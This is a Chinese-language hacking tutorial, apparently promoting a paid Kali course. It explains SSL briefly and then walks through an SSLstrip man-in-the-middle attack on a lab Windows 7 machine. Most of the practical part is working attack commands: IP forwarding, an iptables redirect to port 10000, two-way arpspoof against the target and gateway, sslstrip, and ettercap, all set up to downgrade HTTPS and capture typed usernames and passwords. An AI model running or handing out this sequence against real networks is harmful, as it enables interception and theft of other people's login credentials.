平时我们上网的过程中,经常会发现浏览器中的地址栏前面有个http或者https,这个是web请求时指定的协议。默认情况下,使用HTTP开头的,这个网站上的通信就不会被加密,也就是明文传输;如果是HTTPS,那么不仅加密了,而且攻击时还会在网页中提示证书风险提示,这样就会引起用户的疑心。本节课我们来学习下SSL原理和kali中的sslstrip攻击,你也能速度掌握这些黑客干货!
SSL的作用是为了传输敏感信息(比如凭证、账号密码)提供安全可靠的保障,确保用户使用浏览器和远程服务器之间传输的数据是安全可信的,传输的数据不会被恶意窃取。
当我们访问一个HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并附带证书验证,在得到双方证书有效的前提下,从此两者开始进行SSL安全通信!传输的数据就得到了安全保障!
比如访问一个HTTPS类型的网页,登录个人账号,如果这个网页返回的证书验证没能和浏览器收录的证书匹配,就会弹出证书风险提示,假如进一步继续访问,你输入的用户和密码就不再安全,很有可能被窃取!
基本所有的HTTPS网页比如:https://www。baidu。com,都会采用ssl证书加密机制,这是为了用户的隐私安全不被攻击者明文窃取。上一节课我使用http网页直接能嗅探到用户登录网页的用户密码,如果是https网页,在不使用伪装欺骗技术的前提下,账号是无法窃取,而且还会提示证书风险提示。
那如何绕过ssl进行嗅探https网页提交的个人账号信息呢?
使用SSL Strip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文传输通信,kali能够截获明文数据。而另一边kali进行路由转发,和win7原本要连接的服务器进行正常的https通信!
攻击主机:kali主机 192.168.31.251,进入su root用户下操作!
靶机:Win7 192.168.31.16
网络环境:桥接网络
工具sslstrip:kali2020是没有默认安装的,需要自行安装
如何在kali中安装sslstrip,可以点击>>《白帽黑客kali渗透指南》前往专栏课程学习,视频实战指导更加完整详细,小白入门到实战轻轻松松!
echo 1 > /proc/sys/net/ipv4/ip_forward
意思是往ip_forward文件写入数值1,开启路由转发!
主要作用就是在kali中实现把从win7靶机截获的HTTP流量转发到SSLstrip中,并在10000端口上运行SSLstrip,实现和win7原来要访问的远程服务器建立ssl(https)通信!
在kali下新建终端,输入:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
在终端下输入:
arpspoof -i eth0(网卡) -t 192.168.31.16(目标IP) 192.168.31.1(网关)
在新的终端下输入:
arpspoof -i eth0(网卡) -t 192.168.31.1(网关) 192.168.31.16(目标)
如果你已经安装了sslstrip,那么看下面实战!
新建终端,输入:
sslstrip -a -f -k
此时已经成功开启了sslstrip攻击,就会自动将https ssl加密转换为http明文形式。
为了使用直白的形式在终端中打印嗅探捕获到的用户账号和密码,可以开启ettercap捕获。
新建终端,输入:
ettercap -Tq -i eth0
如图,等待对方在https网页中输入用户名和密码!
A、这里在win7靶机中模拟上网(请直接在浏览器中访问jikejia. cn)
你会发现,成功截获了账号和密码!
iptables -t nat -L (查询当前防火墙规则)
iptables -t nat -D PREROUTING 1(删除当前防火墙规则)
iptables -t nat -L (再次查询当前防火墙规则)